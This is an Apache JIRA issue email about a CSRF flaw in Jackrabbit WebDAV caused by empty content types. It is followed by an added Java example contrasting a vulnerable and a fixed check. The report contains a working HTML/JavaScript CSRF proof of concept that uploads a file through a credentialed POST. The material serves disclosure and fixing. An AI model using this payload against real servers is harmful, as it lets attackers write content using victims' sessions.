[ https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15424812#comment-15424812 ]

Julian Reschke commented on JCR-4002:
-------------------------------------

But that means that code extending from this now will have to the CSRF 
protection, right? If this is true, we need (a) to document that and (b) to 
review the existing code that *does* extend it (JSOP?).

> CSRF in Jackrabbit-Webdav using empty content-type
> --------------------------------------------------
>
>                 Key: JCR-4002
>                 URL: https://issues.apache.org/jira/browse/JCR-4002
>             Project: Jackrabbit Content Repository
>          Issue Type: Bug
>          Components: jackrabbit-webdav
>    Affects Versions: 2.13.1
>            Reporter: Dominique Jäggi
>            Assignee: Dominique Jäggi
>            Priority: Blocker
>              Labels: csrf, security, webdav
>             Fix For: 2.13.2
>
>         Attachments: 
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request 
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
> <html>
>   <body>
>     <script>
>       function submitRequest()
>       {
>         var xhr = new XMLHttpRequest();
>         xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
>         xhr.withCredentials = true;
>         var body = "This file has been uploaded via CSRF.=\r\n";
>         var aBody = new Uint8Array(body.length);
>         for (var i = 0; i < aBody.length; i++)
>           aBody[i] = body.charCodeAt(i); 
>         xhr.send(new Blob([aBody]));
>       }
>     </script>
>     <form action="#">
>       <input type="button" value="Submit request" onclick="submitRequest();" />
>     </form>
>   </body>
> </html>
> {code}
> I will mitigate this particular issue by including a null content type in the 
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
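The content-type gate discussed in the issue, as an added illustration that is not Jackrabbit's own CSRFUtil code: browsers send POST bodies cross-origin without a CORS preflight for the "simple" form types and also when no Content-Type header is present at all (an untyped Blob, as in the report), so a servlet-side check that only matches a list of strings silently lets the null case through. The class name, method names and the set of preflight-free types are assumptions for this example.

```java
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

/**
 * Illustrative CSRF content-type gate for a WebDAV servlet (added example,
 * not Jackrabbit's CSRFUtil). HttpServletRequest.getContentType() returns
 * null when the header is absent, which is exactly the case the report
 * exploits with an untyped Blob body.
 */
public final class CsrfContentTypeCheck {

    /** Media types a browser may send cross-origin with no preflight (assumed list). */
    private static final Set<String> PREFLIGHT_FREE_TYPES = new HashSet<>(Arrays.asList(
            "application/x-www-form-urlencoded",
            "multipart/form-data",
            "text/plain"));

    /** Vulnerable variant: a missing header is never in the list, so it skips the referrer check. */
    public static boolean needsCsrfCheckVulnerable(String contentType) {
        if (contentType == null) {
            return false;            // bug: "no Content-Type" treated as safe
        }
        return PREFLIGHT_FREE_TYPES.contains(mediaType(contentType));
    }

    /** Fixed variant: null is treated like a form post and must pass the referrer check. */
    public static boolean needsCsrfCheckFixed(String contentType) {
        if (contentType == null) {
            return true;             // fix: absent header is in the rejected set
        }
        return PREFLIGHT_FREE_TYPES.contains(mediaType(contentType));
    }

    /** Drop parameters such as ";charset=utf-8" and normalise case before matching. */
    private static String mediaType(String contentType) {
        int semi = contentType.indexOf(';');
        String mt = semi >= 0 ? contentType.substring(0, semi) : contentType;
        return mt.trim().toLowerCase(Locale.ROOT);
    }

    public static void main(String[] args) {
        // constructed sample header values, including the absent-header case
        String[] samples = {null, "text/plain", "application/json", "multipart/form-data; boundary=x"};
        for (String ct : samples) {
            System.out.printf("%-32s vulnerable=%-5b fixed=%b%n",
                    ct, needsCsrfCheckVulnerable(ct), needsCsrfCheckFixed(ct));
        }
    }
}
```

The null row is the one that differs between the two variants; the other rows show the fix does not change how typed requests are classified.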
